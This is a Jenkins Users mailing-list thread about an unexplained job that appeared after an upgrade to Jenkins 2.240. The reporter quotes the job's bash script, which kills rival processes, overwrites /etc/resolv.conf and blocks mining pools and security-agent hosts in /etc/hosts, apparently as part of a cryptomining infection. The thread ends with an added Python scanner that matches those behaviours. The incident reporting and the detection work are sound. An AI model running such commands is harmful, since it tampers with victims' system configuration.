We have locked down the system and have not had a recurrence. If there is one, I will report it ASAP.
Thank you all for the concern :)

Cheers,
Randall

On Wednesday, 1 July 2020 09:55:06 UTC-4, Jan Monterrubio wrote:
>
> Randall/Daniel, if there does end up being malware for this release would
> you mind replying on this thread?
>
> On Monday, June 22, 2020 at 1:00:09 PM UTC-5, Daniel Beck wrote:
>>
>> Thanks for your report.
>>
>> I filed an issue on your behalf in the Jenkins project's private security
>> issue tracker. You should have gotten an email notification from Jira about
>> it. Please provide more information there to help us investigate.
>>
>> > On 22. Jun 2020, at 19:15, Randall Becker <[email protected]> wrote:
>> >
>> > Hi All,
>> >
>> > We just installed Jenkins 2.240 and suddenly there is a job with some really strange content, including:
>> >
>> > #!/bin/bash
>> >
>> > threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
>> > hostHash=$(hostname -f | md5sum | cut -c1-8);
>> > echo "${hostHash} - ${threadCount}";
>> > ktr () {
>> > killall trace;pkill -9 -f trace;killall -s SIGKILL trace
>> > killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
>> > killall viunix;pkill viunix;killall -s SIGKILL viunix
>> > kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
>> > kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
>> > kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
>> > echo kill
>> > }
>> >
>> > ktr
>> > ktr
>> > ktr
>> > echo plsfoodforcatsnlove
>> > echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
>> > echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
>> > echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
>> > echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> /etc/hosts
>> > echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
>> > echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
>> > echo "0.0.0.0 minexmr.com" >> /etc/hosts
>> >
>> > This is really creepy because this script cannot possibly run on our
>> > system (the good part). The bad part is that no one in our organization
>> > created this job. Is it possible that there is some malware floating
>> > around? Our Jenkins instance is hiding behind a firewall so there's no way
>> > in.
>> >
>> > Thanks,
>> > Randall
>> >
>> > --
>> > You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
>> > To unsubscribe from this group and stop receiving emails from it, send an email to [email protected].
>> > To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com.
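
One way to sweep a Jenkins home for jobs like the one quoted above, as an added example that is not part of the original thread or the Jenkins project's code. It assumes freestyle jobs stored as `jobs/<name>/config.xml` with `hudson.tasks.Shell` build steps; the rule names, regexes and sample XML are constructed for illustration.

```python
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

# Behaviours visible in the quoted script; the regexes are this example's own.
RULES = {
    "hosts-file write": re.compile(r">>?\s*/etc/hosts\b"),
    "resolver overwrite": re.compile(r">>?\s*/etc/resolv\.conf\b"),
    "forced process kill": re.compile(r"\b(?:killall\b.*SIGKILL|pkill\s+-9|kill\s+-9)"),
    "host fingerprinting": re.compile(r"hostname\s+-f\s*\|\s*md5sum"),
}

def scan_config(text):
    """Return sorted rule names matched by any shell build step in one config.xml."""
    # Jenkins writes an XML 1.1 declaration; Python's expat-based parser only
    # supports XML 1.0, so drop the declaration before parsing.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", text)
    hits = set()
    for step in ET.fromstring(body).iter("hudson.tasks.Shell"):
        command = step.findtext("command") or ""
        hits.update(name for name, rx in RULES.items() if rx.search(command))
    return sorted(hits)

def scan_jobs(jenkins_home):
    """Map job name -> matched rules for each jobs/<name>/config.xml under jenkins_home."""
    report = {}
    for cfg in sorted(Path(jenkins_home).glob("jobs/*/config.xml")):
        try:
            hits = scan_config(cfg.read_text(encoding="utf-8", errors="replace"))
        except ET.ParseError:
            hits = ["unparseable config.xml"]  # surface it rather than skip silently
        if hits:
            report[cfg.parent.name] = hits
    return report

# Constructed samples (not taken from the reporter's system).
SUSPICIOUS = """<?xml version='1.1' encoding='UTF-8'?>
<project><builders><hudson.tasks.Shell><command>pkill -9 -f trace
echo "0.0.0.0 pool.example.invalid" &gt;&gt; /etc/hosts
echo 'nameserver 192.0.2.53' &gt; /etc/resolv.conf</command></hudson.tasks.Shell></builders></project>"""
BENIGN = """<?xml version='1.1' encoding='UTF-8'?>
<project><builders><hudson.tasks.Shell><command>make test</command></hudson.tasks.Shell></builders></project>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python scan_jobs.py /path/to/jenkins_home
        for job, hits in scan_jobs(sys.argv[1]).items():
            print(f"{job}: {', '.join(hits)}")
    else:
        print(scan_config(SUSPICIOUS), scan_config(BENIGN))
```

Pipeline jobs keep their script in a different element and are not covered by this sweep.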
